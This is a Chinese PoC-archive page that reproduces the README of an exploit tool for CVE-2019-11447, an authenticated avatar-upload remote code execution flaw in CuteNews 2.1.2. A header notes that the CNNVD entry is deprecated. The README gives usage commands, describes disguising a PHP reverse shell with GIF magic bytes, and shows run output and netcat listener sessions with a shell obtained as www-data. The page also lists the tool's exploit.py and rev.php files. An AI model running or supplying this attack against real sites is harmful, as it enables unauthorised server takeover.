关联漏洞
标题:
编号重复
(CVE-2019-11447)
描述:CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。 “废弃”请勿使用此编号。原因:此编号与CNNVD-201110-126编号重复,所有使用CNNVD编号的用户请参考CNNVD-201110-126编号。为防止意外使用,此编号中的所有信息已删除。
描述
Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
介绍
# CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)
> Exploit Code for [CVE-2019-11447](https://nvd.nist.gov/vuln/detail/CVE-2019-11447) aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: Login/Register an account, craft user selected PHP file with .gif magic bytes, uploads the file as an avatar and trigger it to achieve Remote Code Execution.
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
### Usage
```shell
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
```
#### User Inputs :
This exploit expects four arguments to run initially :
- **-l** : CuteNews URL
- **-u** : Username required to Login/Register
- **-p** : Password required to Login/Register
- **-e** : Email required to Login/Register
Additional required user inputs:
- **Select your PHP file ->** Here the user has to specify the PHP file to be uploaded, it can be **any** PHP file Example: PHP info, PHP reverse shell. If the PHP file is located in the same directory as of the exploits then the user can just specify the file name:
Example: `[^] Select your PHP file -> rev.php`
Orelse, user need to specify the location of PHP file:
Example: `[^] Select your PHP file -> ~/Downloads/rev.php`
- **Press y/n to trigger reverse shell ->** Here if the user has uploaded an PHP reverse shell, he/she has the choice whether to trigger the reverse shell using y/n.
Either way the exploit is designed to print out the uploaded file location for further use.
#### Exploit Execution
- Scenario 1 > Login with existing credentials and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
- Scenario 2 > Registering new user and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
## Reference
- <https://nvd.nist.gov/vuln/detail/CVE-2019-11447>
文件快照
[4.0K] /data/pocs/fdc82d593fd79c5c036ee120438607388df29ca5
├── [6.5K] exploit.py
├── [4.7K] README.md
└── [5.4K] rev.php
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。